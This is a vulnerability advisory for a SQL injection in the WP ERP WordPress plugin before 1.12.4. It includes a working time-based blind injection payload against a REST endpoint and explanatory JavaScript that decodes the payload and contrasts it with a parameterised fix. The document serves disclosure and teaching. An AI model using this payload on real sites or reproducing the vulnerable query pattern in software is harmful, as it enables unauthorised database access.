wpexploit | Arvandy | WPEX-ID:435DA8A1-9955-46D7-A508-B5738259E731
History: Jun 05, 2023 - 12:00 a.m.

WP ERP < 1.12.4 - Admin+ SQL Injection

2023-06-05 00:00:00
Arvandy
73
Tags: wordpress, erp, sql injection, admin, vulnerability, exploit

EPSS: 0.002
Percentile: 52.0%

The plugin does not properly sanitise and escape the type parameter of the erp/v1/accounting/v1/people REST API endpoint before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins. Versions of WP ERP before 1.12.4 are affected.

Sign in as an admin. In WP Admin, run the following code in the browser console and notice that the request takes several seconds to complete (the injected SLEEP(3) is executed by the database), demonstrating the SQL injection vulnerability. The injected value is time-based and blind: the response carries no error and no extra data, only the delay.

await wp.apiRequest({path: `/erp/v1/accounting/v1/people?type=x')+AND+(SELECT+1+FROM+(SELECT+SLEEP(3))x)+AND+('x'%3d'x`});
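The following JavaScript is an added illustration and is not WP ERP's own code or part of the original advisory. It decodes the type value from the PoC path above, shows how that value would be spliced into an assumed string-built SQL statement (the table name "people", the IN ('...') template and the allow-list of types are assumptions made for illustration), checks that the resulting statement still parses, and contrasts it with an allow-listed, parameterised variant.

```javascript
// Added illustration, not WP ERP's own code. POC_PATH is copied from the
// advisory's PoC; the SQL template, the table name "people" and the
// allow-list of types are assumptions for illustration only.

const POC_PATH =
  "/erp/v1/accounting/v1/people?type=x')+AND+(SELECT+1+FROM+(SELECT+SLEEP(3))x)+AND+('x'%3d'x";

// Decode one query-string parameter the way a PHP backend sees it in $_GET:
// '+' is a space and %XX sequences are percent-decoded.
function getQueryParam(path, name) {
  const qs = path.includes("?") ? path.slice(path.indexOf("?") + 1) : "";
  for (const pair of qs.split("&")) {
    const eq = pair.indexOf("=");
    const key = eq === -1 ? pair : pair.slice(0, eq);
    if (key !== name) continue;
    const raw = eq === -1 ? "" : pair.slice(eq + 1);
    return decodeURIComponent(raw.replace(/\+/g, " "));
  }
  return null;
}

// Assumed shape of the unsafe statement: the value is spliced into the SQL
// text. The payload's leading "')" closes the intended quoted value and
// parenthesis, the SLEEP subquery then runs as part of the WHERE clause, and
// the trailing "AND ('x'='x" re-balances quotes and parentheses against the
// template's own "')" so the statement still parses.
function buildVulnerableQuery(type) {
  return "SELECT * FROM people WHERE type IN ('" + type + "')";
}

// Hardened variant: reject anything outside a fixed allow-list and pass the
// value as a bound parameter instead of splicing it into the SQL text.
const ALLOWED_TYPES = new Set(["customer", "vendor"]); // hypothetical list
function buildSafeQuery(type) {
  if (!ALLOWED_TYPES.has(type)) {
    throw new Error("invalid people type: " + JSON.stringify(type));
  }
  return { sql: "SELECT * FROM people WHERE type IN (?)", params: [type] };
}

// Checks that quotes and parentheses in a statement balance. A payload that
// breaks the balance produces a syntax error instead of a delay, so this is
// the property an injected value must preserve to be useful.
function isBalanced(sql) {
  let depth = 0;
  let inString = false;
  for (const ch of sql) {
    if (ch === "'") inString = !inString;
    else if (!inString && ch === "(") depth++;
    else if (!inString && ch === ")") depth--;
    if (depth < 0) return false;
  }
  return depth === 0 && !inString;
}

// Time-based blind SQLi yields no error and no data, only a delay; this is the
// comparison a tester applies to the response time of the PoC request against
// a baseline request without the payload.
function looksDelayed(elapsedMs, baselineMs, sleepSeconds) {
  return elapsedMs - baselineMs >= sleepSeconds * 1000;
}

const injected = getQueryParam(POC_PATH, "type");
console.log("decoded type:", injected);
console.log("vulnerable SQL:", buildVulnerableQuery(injected));
console.log("balanced:", isBalanced(buildVulnerableQuery(injected)));
try {
  buildSafeQuery(injected);
} catch (e) {
  console.log("hardened variant rejected it:", e.message);
}
```

Run it with node; the decoded value and the assembled statement are printed so the role of each fragment of the payload can be read off directly. The allow-list plus bound parameter is the shape of fix to look for in 1.12.4 and later: a value that cannot reach the SQL text as raw characters cannot close the quote in the first place.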

